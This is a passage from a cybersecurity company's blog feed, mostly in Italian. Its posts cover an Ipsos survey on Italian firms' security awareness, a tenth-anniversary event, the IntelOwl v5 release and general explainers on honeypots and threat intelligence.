&lt;p&gt;Compila il form e scarica il Company Profile&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Cybersecurity 2023]]></title><description><![CDATA[Qual è la consapevolezza delle aziende italiane?]]></description><link>https://www.certego.net/blog/cybersecurity-2023/</link><guid isPermaLink="false">cybersecurity-2023</guid><category><![CDATA[Whitepaper]]></category><pubDate>Mon, 24 Jul 2023 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Presentata in anteprima durante l’evento “La Forma dell’acqua” TEN YEARS OF CERTEGO, l’indagine commissionata ad &lt;strong&gt;Ipsos&lt;/strong&gt;, con il supporto di &lt;strong&gt;24ORE Business School&lt;/strong&gt;, è ora disponibile.&lt;/p&gt;
&lt;p&gt;Il report di ricerca, &lt;strong&gt;“Cybersecurity 2023, qual è la consapevolezza delle aziende italiane?”&lt;/strong&gt; si propone di analizzare il livello e la consapevolezza delle organizzazini sui temi della digitalizzazione e della cybersecurity.&lt;/p&gt;
&lt;p&gt;Il campione di ricerca comprende 220 interviste ad altrettante aziende italiane con almeno 10 addetti, nei settori dell’industria, commercio e servizi e un’unità di intervista rivolta ai responsabili nell’ambito della trasformazione digitale e della sicurezza informatica.&lt;/p&gt;
&lt;p&gt;Alcuni punti fondamentali emersi dall’indagine:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;il digitale viene ancora identificato primariamente come un costo e non come un investimento, specialmente per le aziende di piccole dimensioni;&lt;/li&gt;
&lt;li&gt;permane un gap culturale sulla sicurezza informatica all&apos;interno delle aziende;&lt;/li&gt;
&lt;li&gt;vi è un’incongruenza tra la percezione del rischio informatico (le aziende si sentono sicure) e la mancanza di procedure operative di Incident Response da mettere in atto in caso di un attacco;&lt;/li&gt;
&lt;li&gt;l’esigenza della formazione per sensibilizzare i propri dipendenti è molto sentita da tutte le aziende.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Compila il form per ricevere il report e approfondire i risultati della ricerca.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Certego X | La forma dell'acqua]]></title><link>https://www.certego.net/blog/certego-x-coming-soon/</link><guid isPermaLink="false">certego-x-coming-soon</guid><category><![CDATA[Event]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi]]></dc:creator><pubDate>Thu, 22 Jun 2023 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Quest&apos;anno Certego festeggia i 10 anni della sua nascita&lt;/strong&gt;.
Per farlo abbiamo scelto due sedi esclusive: &lt;strong&gt;Palazzo di Varignana&lt;/strong&gt; sulle colline di Bologna, un luogo sorprendente di sapori e sensazioni dalle radici antiche e &lt;strong&gt;Boom&lt;/strong&gt; a Castel San Pietro Terme, il nuovo hub della conoscenza.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Sarà una giornata di incontri e di progetti&lt;/strong&gt;. Giornalisti, accademici, sportivi, esperti di cybercrime ci accompagneranno per scoprire nuove forme di adattamento e difesa:
perché la sicurezza è un percorso da fare insieme!&lt;/p&gt;
&lt;p&gt;Scopri in anteprima i primi dettagli dell&apos;evento.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Certego. la sicurezza informatica deve diventare adattiva]]></title><description><![CDATA[La società festeggia 10 anni e affida a Ipsos un’indagine per fare il punto sulla Cyber in Italia]]></description><link>https://www.certego.net/blog/news-certego-x/</link><guid isPermaLink="false">news-certego-x</guid><category><![CDATA[News]]></category><pubDate>Thu, 22 Jun 2023 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Certego, società italiana leader nella Cybersecurity, ha celebrato i 10 anni dalla fondazione, organizzando un evento celebrativo dal titolo evocativo “La forma dell’acqua”, a Palazzo di Varignana, sulle colline di Bologna. L’iniziativa, partendo da questo importante traguardo, ha avuto lo scopo di fare un punto sullo stato dell’arte della sicurezza informatica.
Nell’ambito del digitale, 10 anni sono un tempo estremamente lungo, nel corso del quale il mondo è stato attraversato da eventi che hanno finito per accelerare e rendere estremamente complessa la gestione della sicurezza informatica, pensiamo in particolare, alla pandemia e alla guerra in Ucraina. Essere come l’acqua vuol dire essere capaci di trasformarsi in modo da poter agire al meglio in ogni situazione, perché la cyber security oggi non può più limitarsi ad essere preventiva, ma deve necessariamente essere adattiva.&lt;/p&gt;
&lt;p&gt;L’evento, presentato dalla giornalista Marta Perego, ha visto susseguirsi sul palco, non solo esperti del settore, di profilo nazionale ed internazionale, ma anche sportivi, come Maurizia Cacciatori, la più amata Capitana della nostra Nazionale di Pallavolo, per raccontare la sicurezza informatica attraverso parallelismi sui temi dell’attacco e della difesa.
Tra i partecipanti: Thomas Schreck, Professore di IT Security, Munich University of Applied Sciences, che ha mostrato le tendenze e le sfide emergenti che le organizzazioni dovranno affrontare nei prossimi anni, e Francesco Zampieri, Docente di Studi Strategici c/o l&apos;Istituto di Studi Militari Marittimi (ISMM) e Ricercatore Senior nell&apos;ambito del Centro Studi ISMM, che ha evidenziato la pervasività della minaccia cibernetica nel dominio marittimo.&lt;/p&gt;
&lt;p&gt;L’iniziativa è stata aperta dall’intervento del &lt;strong&gt;CEO di Certego, Bernardino Grignaffini&lt;/strong&gt; che ha evidenziato come &lt;em&gt;“oggi ci troviamo di fronte ad una tempesta perfetta: alla crescita della digitalizzazione si associa, di fatto, una costante pervasività della criminalità informatica. Negli anni, abbiamo compreso di avere bisogno di una maggiore collaborazione pubblico-privato ma soprattutto dobbiamo essere consapevoli che senza un’analisi conoscitiva dei nostri avversari non è possibile contrastare questo fenomeno. Per questo il nostro obiettivo per il futuro – ha aggiunto Grignaffini – è quello di continuare ad investire sulla nostra piattaforma PanOptikon per essere in grado di rilevare le minacce e di intervenire in modo adeguato”&lt;/em&gt;.
&lt;strong&gt;Alberto Valentini, Chief Information Security di Crif&lt;/strong&gt;, ha sottolineato che &lt;em&gt;“dal nostro osservatorio mondiale possiamo affermare come il fenomeno del cyber crime non risparmi oramai nessuna area geografica, ovunque il tema della criminalità informatica è pervasivo. Soprattutto, in termini di consapevolezza, dobbiamo comprendere che la cybersecurity è un tema di business non solo di information technology”&lt;/em&gt;.&lt;/p&gt;
&lt;h3&gt;L’indagine IPSOS sulla consapevolezza delle aziende italiane in tema di Cybersicurezza&lt;/h3&gt;
&lt;p&gt;Durante l’evento è stata presentata in anteprima l’indagine commissionata da Certego a Ipsos, con il supporto di 24ORE Business School, una delle principali scuole di formazione in Italia, sul tema “&lt;strong&gt;Cybersecurity 2023, qual è la consapevolezza delle aziende italiane.&lt;/strong&gt;”
Su un campione di circa 170.000 aziende italiane con almeno 10 addetti, nei settori dell’industria, commercio e servizi e un’unità di intervista rivolta ai responsabili nell’ambito della trasformazione digitale e della sicurezza informatica, è emerso che:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;il digitale viene ancora identificato primariamente come un costo e non come un investimento, specialmente per le aziende di piccole dimensioni;&lt;/li&gt;
&lt;li&gt;permane un gap culturale sulla sicurezza informatica all&apos;interno delle aziende;&lt;/li&gt;
&lt;li&gt;vi è un’incongruenza tra la percezione del rischio informatico (le aziende si sentono sicure) e la mancanza di procedure operative di Incident Response da mettere in atto in caso di un attacco;&lt;/li&gt;
&lt;li&gt;l’esigenza della formazione per sensibilizzare i propri dipendenti è molto sentita da tutte le aziende.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Luigi Angelini, relazioni istituzionali di 24ORE Business School&lt;/strong&gt;, ha commentato: &lt;em&gt;“il ruolo della formazione sarà centrale nel fronteggiare la criminalità informatica; la persona giocherà un ruolo determinante anche rispetto allo sviluppo della tecnologia; in tale ottica, sarà necessario agire per sviluppare una cultura sul tema che porti ad accrescere la consapevolezza e crei competenze diffuse e di livello all’interno delle organizzazioni pubbliche e private”&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;La sessione plenaria dell&apos;evento ha visto come ultimo relatore &lt;strong&gt;Alessandro Di Carlo, Forensics &amp;#x26; Product Manager di Certego&lt;/strong&gt;, che ha ripercorso i primi albori tecnologici dell’azienda evidenziando come fin dalla nascita, essa si sia distinta per l’innovazione che è riuscita a portare all’interno del mercato della Cyber Security. “&lt;em&gt;Basti pensare che nel 2013 il termine MDR (Managed Detection &amp;#x26; Response) ufficialmente non aveva ancora visto la luce, venendo coniato solo successivamente da Gartner. Certego quindi ha avuto la lungimiranza di erogare un servizio assolutamente innovativo per l’epoca&lt;/em&gt;”. L’intervento ha poi evidenziato come, dietro un attacco informatico ci siano persone e che, per contrastarlo, la tecnologia di difesa richieda comunque il giudizio e la supervisione di un team di esperti in ambito cyber security. In chiusura, Alessandro ha avuto modo di evidenziare quelle che saranno le novità della piattaforma PanOptikon, disponibili nei prossimi mesi.&lt;/p&gt;
&lt;p&gt;Nel pomeriggio, presso BOOM, l’innovativo hub della conoscenza di Crif, si è poi tenuta una sessione di training sui temi innovativi del cybercrime con percorsi di formazione e laboratori organizzati assieme ai partner dell’evento &lt;em&gt;VMWARE, Qualys, Palantir e Hermes Bay&lt;/em&gt;, in particolare:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;“Tabletop Exercise for CISO”&lt;/strong&gt; – coordinato da Certego e Alessandro Calabrese - Senior Risk &amp;#x26; Security
Consultant, Hermes Bay: il gioco di ruolo pensato per confrontarti in piccoli gruppi, insieme ad altri professionisti, sulle scelte da prendere nelle diverse fasi di un incidente informatico e verificarne le conseguenze.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;“NIS2: Aspetti e impatti tecnologici della nuova direttiva europea”&lt;/strong&gt; – tenuto a  Mattia Spagnoli - Lead Solution Engineer, &lt;strong&gt;VMWARE&lt;/strong&gt;: laboratorio in cui si analizza, attraverso casi reali, come condurre attività di Response e Recovery in adempimento con i nuovi regolamenti UE.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Holistic Approach to Software Security&lt;/strong&gt;, tenuto da Elad Foa - Security Chief Operating Officer, &lt;strong&gt;Palantir&lt;/strong&gt;: un focus sull’importanza di un approccio olistico e di best practice condivise per gestire efficacemente le sfide della cyber sicurezza.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;“Continuous Vulnerability Assessment: migliorare le attività di Detection conoscendo i propri punti deboli”&lt;/strong&gt; – tenuto da rancesco Bassetto - Technical Account Manager, &lt;strong&gt;Qualys&lt;/strong&gt;: laboratorio in cui si sperimenta come una strategia basata su attività di Continuous Vulnerability Assessment  permette di migliorare la fase di Detection e predisporre eventuali procedure di Incident Response in tempi più rapidi.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[IntelOwl v5 released!]]></title><description><![CDATA[The new Major Release of the Popular Threat Intelligence Platform]]></description><link>https://www.certego.net/blog/intelowl-v5-released/</link><guid isPermaLink="false">intelowl-v5-released</guid><category><![CDATA[News]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Threat Intelligence]]></category><category><![CDATA[Open Source]]></category><dc:creator><![CDATA[Matteo Lodi, Threat Intel Team Leader]]></dc:creator><pubDate>Mon, 29 May 2023 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Certego has always been strongly involved and participating in open source projects.&lt;/p&gt;
&lt;p&gt;For this reason, we created the &lt;a href=&quot;https://github.com/intelowlproject/IntelOwl&quot;&gt;IntelOwl&lt;/a&gt; project at the start of 2020 (see the &lt;a href=&quot;https://www.certego.net/blog/new-year-new-tool-intel-owl/&quot;&gt;blog post&lt;/a&gt;). At that moment we did know that the cyber security community really struggled in automating common and daily routine tasks. &lt;em&gt;&lt;strong&gt;IntelOwl&lt;/strong&gt;&lt;/em&gt; aimed at filling that gap.&lt;/p&gt;
&lt;p&gt;We succeeded. We had strong feedback from the community: we reached almost 3k stars in Github and more and more people tried to participate in the project.&lt;/p&gt;
&lt;p&gt;As Certego, we have been leveraging IntelOwl internally to facilitate and speed up the gathering of Threat Intelligence data. It is a tool that we can’t live without anymore.&lt;/p&gt;
&lt;p&gt;For this reason we started to think and to focus about the future of the project: we want to make IntelOwl a complete Threat Intelligence Platform that people can use to perform security-related investigations of any kind.&lt;/p&gt;
&lt;p&gt;Last year we reached the first step of this process: with IntelOwl v4 we released a &lt;a href=&quot;&quot;&gt;fresh new revamped Graphical User Interface&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;Today we are proud to announce &lt;strong&gt;a new major release: v5!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We heard the community feedback! During the event at &lt;a href=&quot;https://fosdem.org/2023/schedule/event/security_intelowl/&quot;&gt;Fosdem&lt;/a&gt; we announced that we were working in adding an &lt;em&gt;aggregated and simplified visualization of analyzer results&lt;/em&gt;.
We created it. Now, by leveraging a new plugin type called &lt;b&gt;Visualizers&lt;/b&gt;, you will be able to create custom visualizations, based on your specific use cases!&lt;/p&gt;
&lt;p&gt;This framework is extremely powerful and allows every user to customize the GUI as they wish. But you know...with great power comes great responsability. To fully leverage this framework, you would need to put some effort in place. You would need to understand which data is useful for you and then write few code lines that would create your own GUI.&lt;/p&gt;
&lt;p&gt;That would speed the analysis of the results a lot if done correctly!&lt;/p&gt;
&lt;p&gt;We strongly suggest you check all the details regarding this new release in the &lt;a href=&quot;https://github.com/intelowlproject/IntelOwl/blob/develop/.github/CHANGELOG.md#v500&quot;&gt;official Changelog&lt;/a&gt; and to try the new application by yourself!&lt;/p&gt;
&lt;p&gt;Moreover this release anticipates other important crucial steps for IntelOwl:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;On June 10th &lt;a href=&quot;https://twitter.com/matte_lodi&quot;&gt;Matteo Lodi&lt;/a&gt; and &lt;a href=&quot;https://twitter.com/0ssig3no&quot;&gt;Simone Berni&lt;/a&gt; are presenting IntelOwl at one of the most important Cyber Security events in Italy: &lt;a href=&quot;https://www.hackinbo.it/programma.php&quot;&gt;HackinBo&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;On May 28th the &lt;a href=&quot;https://developers.google.com/open-source/gsoc/timeline&quot;&gt;Google Summer of Code 2023&lt;/a&gt; is starting and IntelOwl is participating again with 2 new students! Welcome to &lt;a href=&quot;https://twitter.com/stay_away_plss&quot;&gt;Shivam Purohit&lt;/a&gt; and &lt;a href=&quot;https://twitter.com/abheekblahblah&quot;&gt;Abheek Tripathy&lt;/a&gt;!&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As mentioned earlier, this is just another step of a long-term plan. We planned to add to the project some new exciting features that would transform it into a fully fledged Investigation platform that everyone working in cyber security could use for his own goal. If you want to be updated on everything that we are doing and participate in the discussions about the future of the platform, don’t forget that the project is public and everyone is welcome to the community around it! You can follow the project in Github &lt;a href=&quot;https://github.com/intelowlproject/IntelOwl&quot;&gt;here&lt;/a&gt; and to try the new application by yourself!&lt;/p&gt;
&lt;p&gt;Thanks for reading and happy hunting!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Honeypot: trappole per cybercriminali]]></title><description><![CDATA[Nonostante il nome invitante, gli Honeypot danno filo da torcere agli hacker. Scopriamo perché queste “trappole” rappresentano un tassello fondamentale delle strategie adattive di cybersecurity di ogni azienda]]></description><link>https://www.certego.net/blog/honeypot-trappole-per-cybercriminali/</link><guid isPermaLink="false">honeypot-trappole-per-cybercriminali</guid><category><![CDATA[Blog]]></category><category><![CDATA[Threat Intelligence]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing Specialist]]></dc:creator><pubDate>Thu, 27 Apr 2023 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Non solo gli hacker si evolvono, ma fortunatamente anche le tecniche difensive e di studio degli attacchi sono in continuo perfezionamento, e se ben applicate possono dare serio filo da torcere ai criminali informatici!&lt;/p&gt;
&lt;p&gt;Una di queste è rappresentata dagli Honeypot.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;1. Cos’è un Honeypot?&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Il termine Honeypot deriva dal mondo dello spionaggio militare, in cui le spie ricorrevano all’inganno - metaforicamente rappresentato da un invitate e gustoso vaso di miele - per attrarre i nemici ed estorcere a loro insaputa le informazioni.
Allo stesso modo, l’arte dell’inganno viene oggi impiegata anche sul campo delle battaglie informatiche.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Un cyber honeypot è una trappola, volutamente progettata per sembrare a tutti gli effetti un reale bersaglio agli occhi dell’hacker. Lo scopo è convincere l’attaccante che ha avuto accesso al reale sistema informatico e incoraggiarlo a trascorrere il maggior tempo possibile all&apos;interno di questo ambiente per controllarlo, studiarne le tecniche di attacco, valutarne le capacità e i livelli di sofisticazione&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Un honeypot può essere modellato su qualsiasi risorsa digitale, inclusi server, applicazioni software o la rete stessa.&lt;/p&gt;
&lt;p&gt;Infine, ma non meno importante, un Honeypot funge anche da esca per &lt;strong&gt;distrarre i criminali dagli obiettivi reali&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Grazie all’analisi dei comportamenti degli attaccanti, le informazioni d’&lt;a href=&quot;https://www.certego.net/services/cyber-threat-intelligence/&quot;&gt;intelligence&lt;/a&gt; raccolte dagli honeypot aiutano le organizzazioni a &lt;strong&gt;potenziare i sistemi di rilevamento e di risposta agli attacchi&lt;/strong&gt;, nonché ad adattare la propria strategia di sicurezza informatica alle nuove minacce&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;2. Come funziona un Honeypot?&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Un honeypot &lt;strong&gt;assomiglia esattamente ad un vero sistema informatico&lt;/strong&gt; e comprende le applicazioni e i dati che i criminali informatici utilizzano per identificare un obiettivo ideale.&lt;/p&gt;
&lt;p&gt;Un honeypot può assumere diverse sembianze. Ad esempio, può essere creato per simulare un gateway di pagamento, un obiettivo popolare per gli hacker, che contiene grandi quantità di informazioni personali e dettagli sulle transazioni, come numeri di carta di credito o informazioni sul conto bancario. Può anche simulare un database, che attira i criminali a raccogliere proprietà intellettuale, segreti commerciali o altre preziose informazioni sensibili.&lt;/p&gt;
&lt;p&gt;Una volta che l’hacker è all’interno dell’honeypot, il &lt;a href=&quot;https://www.certego.net/services/cyber-threat-intelligence/&quot;&gt;team d’intelligence&lt;/a&gt; è in grado di osservarne i movimenti, prendere nota delle varie tecniche implementate e di &lt;strong&gt;analizzare come le difese del sistema reggono o falliscono&lt;/strong&gt;.
Questo permetterà all’organizzazione di &lt;strong&gt;adattare rapidamente i protocolli di sicurezza esistenti&lt;/strong&gt;, per contrastare attacchi simili, su obiettivi reali, che potrebbero verificarsi in futuro.&lt;/p&gt;
&lt;p&gt;Per rendere gli honeypot più attraenti, spesso, questi contengono vulnerabilità di sicurezza deliberate ma non necessariamente ovvie. Data la natura avanzata di molti avversari digitali, &lt;strong&gt;è importante che l’Honeypot non sembri troppo facile da attaccare&lt;/strong&gt;. È improbabile che una rete non sufficientemente protetta inganni un avversario e potrebbe persino portare il malintenzionato, una volta resosi conto che si tratta di una trappola, a fornire informazioni errate o manipolare in altro modo l&apos;ambiente per ridurne l’efficacia.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;3. Benefici (e rischi) degli Honeypot&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Gli honeypot rappresentano una parte importante di una strategia globale di sicurezza informatica e offrono diversi vantaggi che possono essere sfruttati per migliorare la sicurezza dell’organizzazione.&lt;/p&gt;
&lt;h3&gt;Facilità di analisi&lt;/h3&gt;
&lt;p&gt;Il traffico all’interno degli honeypot è limitato ai criminali informatici. Pertanto, in fase di analisi, non sarà necessario separare il traffico generato dagli attaccanti dal traffico web legittimo. Ciò significa che il team di sicurezza informatica sarà in grado &lt;strong&gt;dedicare più tempo all&apos;analisi del comportamento dei criminali informatici&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;Evoluzione continua&lt;/h3&gt;
&lt;p&gt;Una volta implementati, gli honeypot possono deviare un attacco informatico e raccogliere continuamente informazioni. In questo modo, il team di Threat Intelligence potrà registrare quali tipi di attacchi si stanno verificando e come si evolvono nel tempo. Questo rappresenta per le aziende l&apos;opportunità di &lt;strong&gt;modificare i propri protocolli di sicurezza e adattarli alle nuove minacce riscontrate all’interno degli Honeypot&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;Identificazione delle minacce interne&lt;/h3&gt;
&lt;p&gt;Gli honeypot permettono di &lt;strong&gt;identificare minacce alla sicurezza sia interne che esterne&lt;/strong&gt;. Sebbene molte tecniche di sicurezza informatica si concentrino sui rischi provenienti dall&apos;esterno dell&apos;organizzazione, gli honeypot sono in grado di far confluire al proprio interno anche attori malevoli, che hanno già avuto accesso all’infrastruttura e che stanno tentando di accedere ai dati, agli indirizzi IP o ad altre informazioni sensibili dell&apos;organizzazione.&lt;/p&gt;
&lt;p&gt;È importante sottolineare che anche gli hacker possono utilizzare gli Honeypot a loro vantaggio. Qualora un attaccante fosse in grado di riconoscere che l’ambiente a cui ha avuto accesso è un&apos;esca, potrebbe intenzionalmente inondare l&apos;honeypot con attacchi ripetuti per distogliere l&apos;attenzione dagli attacchi reali al sistema informatico reale o fornire deliberatamente informazioni errate all&apos;honeypot. Proprio per questo &lt;strong&gt;è fondamentale affidare la creazione e l’analisi dei dati degli Honeypot ad analisti esperti&lt;/strong&gt; in grado preparare un ambiente non riconoscibile in quanto esca.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;4. Classificazione degli Honeypot&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Gli honeypot possono essere classificati in molti modi diversi.
A livello più basilare, gli honeypot sono differenziabili &lt;strong&gt;in base allo scopo per cui vengono utilizzati&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;Production Honeypot&lt;/h3&gt;
&lt;p&gt;I Production Honeypot sono quelli più comuni. Questa esca viene utilizzata dalle aziende per raccogliere informazioni di intelligence sugli attacchi informatici all&apos;interno della rete di produzione. Ciò può includere indirizzi IP, data e ora dei tentativi di intrusione, volume di traffico e altri attributi.&lt;/p&gt;
&lt;h3&gt;Research Honeypot&lt;/h3&gt;
&lt;p&gt;I Research Honeypot sono progettati per raccogliere informazioni sui metodi e le tecniche utilizzate dagli avversari, al fine di analizzare quali possibili vulnerabilità esistono all&apos;interno del sistema in riferimento a tali tattiche.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;5. Complessità degli Honeypot&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Gli Honeypot possono inoltre essere classificati in base alla loro complessità e al livello di interazione.&lt;/p&gt;
&lt;h3&gt;Low-interaction Honeypot&lt;/h3&gt;
&lt;p&gt;Gli Honeypot a bassa interazione utilizzano un numero limitato di risorse e si limitano alla raccolta di informazioni basilari sugli attaccanti.
Poiché sono piuttosto semplici, è improbabile che attirino a lungo l&apos;attenzione di un attaccante. Come indicato nel paragrafo “Benefici (e rischi) degli Honeypots”, considerato il crescente livello di conoscenze dei criminali informatici, alcuni hacker potrebbero individuare Honeypot di “basso livello” ed evitarli o addirittura sfruttarli per fornire appositamente informazioni errate.&lt;/p&gt;
&lt;h3&gt;High-interaction Honeypot&lt;/h3&gt;
&lt;p&gt;Rispetto ai precedenti, sono &lt;strong&gt;progettati per coinvolgere i criminali informatici per lunghi periodi di tempo attraverso una rete di obiettivi esplorativi&lt;/strong&gt;. I team di Threat Intelligence più evoluti fanno ricorso a questa tipologia di Honeypot per ottenere una &lt;strong&gt;comprensione più profonda delle tecniche di attacco&lt;/strong&gt;. Rispetto ai Low-interaction Honeypot forniscono informazioni di qualità superiore e più funzionali per adattare i protocolli di sicurezza già in uso. La maggior parte dei Research Honeypot sono considerati honeypot ad alta interazione.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;6. Tipologie di Honeypot&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Infine, è possibile completare il processo di classificazione degli Honeypot suddividendoli in base al tipo di attività che rilevano. Vediamo alcuni esempi:&lt;/p&gt;
&lt;h3&gt;Email o Spam Honeypot&lt;/h3&gt;
&lt;p&gt;Un Email o Spam Honeypot consiste in un indirizzo e-mail fittizio, inserito in un campo nascosto, che può essere rilevato solo da un raccoglitore automatico di indirizzi o da un crawler del sito. Poiché l&apos;indirizzo email non è visibile agli utenti legittimi, grazie a questa tipologia di honeypot è possibile classificare come spam tutta la corrispondenza consegnata a quella casella di posta e bloccare quel mittente e il suo indirizzo IP, nonché tutti i messaggi che corrispondono al suo contenuto.&lt;/p&gt;
&lt;h3&gt;Database Honeypot&lt;/h3&gt;
&lt;p&gt;Un Database Honeypot è un set di dati fittizio, intenzionalmente vulnerabile, per monitorare le vulnerabilità dei software e le fragilità dell&apos;architettura di rete. Il database esca raccoglierà informazioni sulle tecniche di iniezione, il dirottamento delle credenziali o l&apos;abuso dei privilegi utilizzati da un utente malintenzionato che possono quindi essere integrate nelle difese del sistema e nelle politiche di sicurezza.&lt;/p&gt;
&lt;h3&gt;Malware Honeypot&lt;/h3&gt;
&lt;p&gt;Un Malware Honeypot emula un’applicazione software o un&apos;interfaccia di programmazione dell&apos;applicazione nel tentativo di attirare attacchi di malware in un ambiente controllato e non minaccioso. Consente al Team di Threat Intelligence di analizzare le tecniche di attacco e sviluppare o migliorare soluzioni anti-malware per affrontare queste specifiche vulnerabilità, minacce o attori.&lt;/p&gt;
&lt;h3&gt;Spider Honeypot&lt;/h3&gt;
&lt;p&gt;Simile all’Email o Spam Honeypot, uno Spider Honeypot è progettato per intrappolare i web crawler, a volte chiamati spider, creando pagine web e collegamenti accessibili solo ai crawler automatici. L&apos;identificazione di questi spider può aiutare le organizzazioni a capire come bloccare i bot dannosi.&lt;/p&gt;
&lt;h3&gt;Certego Cyber Threat Intelligence&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://www.certego.net/services/cyber-threat-intelligence/&quot;&gt;&lt;strong&gt;Quokka&lt;/strong&gt;&lt;/a&gt; è la piattaforma di Threat Intelligence di Certego per la raccolta, classificazione, analisi e condivisione delle informazioni sulle minacce e tattiche evolute.&lt;/p&gt;
&lt;p&gt;Quokka è il cuore delle attività di Threat Intelligence di Certego:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Riceve input e richieste di analisi (IP, Domini, File, ecc.) da honeypot, sensori e utenti&lt;/strong&gt;;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Elabora e correla i risultati per produrre una risposta&lt;/strong&gt; che può essere facilmente utilizzata in più contesti: avvisi automatici, analisi manuale, arricchimento dei dati, ecc.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I dati vengono continuamente aggiornati dal team di ricerca e automaticamente diffusi sulla piattaforma di &lt;a href=&quot;https://www.certego.net/services/managed-detection-and-response/&quot;&gt;&lt;strong&gt;Managed Detection and Response&lt;/strong&gt;&lt;/a&gt; proprietaria &lt;a href=&quot;https://www.certego.net/platform/security-operations-platform/&quot;&gt;&lt;strong&gt;Certego PanOptikon®&lt;/strong&gt;&lt;/a&gt; , per adattare in tempo reale i sistemi di sicurezza dei nostri clienti ed identificare le minacce più innovative.&lt;/p&gt;
&lt;p&gt;I servizi di Cyber Threat Intelligence di Certego aiutano inoltre le aziende a prendere decisioni più rapide, migliorare l’impatto degli investimenti e la distribuzione delle risorse aziendali per le attività di cybersecurity.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.certego.net/services/cyber-threat-intelligence/&quot;&gt;Per saperne di più consulta l’area del nostro sito dedicata alla Cyber Threat Intelligence.&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Cyber Threat Intelligence: conosci e anticipa il tuo avversario]]></title><description><![CDATA[Quali sono le nuove minacce che potresti affrontare nell’immediato futuro? La conoscenza dell’avversario è un fattore imprescindibile per aumentare le proprie difese informatiche. Scopriamo come farlo con la Cyber Threat Intelligence]]></description><link>https://www.certego.net/blog/cyber-threat-intelligence-conosci-e-anticipa-il-tuo-avversario/</link><guid isPermaLink="false">cyber-threat-intelligence-conosci-e-anticipa-il-tuo-avversario</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing Specialist]]></dc:creator><pubDate>Thu, 06 Apr 2023 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Anno 2023 d.C., il mondo della sicurezza informatica è in costante cambiamento, hacker e difensori sono in continuo conflitto per superarsi a vicenda. Chi ha il compito di proteggere le aziende sa che è fondamentale &lt;strong&gt;conoscere la prossima mossa degli attaccanti&lt;/strong&gt; per poter personalizzare in modo proattivo le proprie difese e prevenire gli attacchi.&lt;/p&gt;
&lt;p&gt;Le organizzazioni sono consapevoli che la &lt;a href=&quot;https://www.certego.net/services/cyber-threat-intelligence/&quot;&gt;Cyber Threat Intelligence&lt;/a&gt; riveste ormai un ruolo di primo piano, ciononostante &lt;strong&gt;la maggior parte delle aziende continua a concentrare i propri sforzi solo sui casi d&apos;uso più basilari&lt;/strong&gt;, come l&apos;integrazione dei feed dei dati sulle minacce con la rete esistente, IPS e firewall, senza sfruttare appieno le informazioni che l&apos;intelligence può offrire.&lt;/p&gt;
&lt;p&gt;In questo articolo analizziamo il concetto di Cyber Threat Intelligence per evidenziare come la sua applicazione evoluta rappresenta oggi un’arma indispensabile per ottenere un vantaggio competitivo sugli hacker.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;1. Cos’è la Cyber Threat Intelligence?&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;La Cyber Threat Intelligence è la capacità di intelligence sviluppata in ambito Cybersecurity&lt;/strong&gt;.&lt;/p&gt;
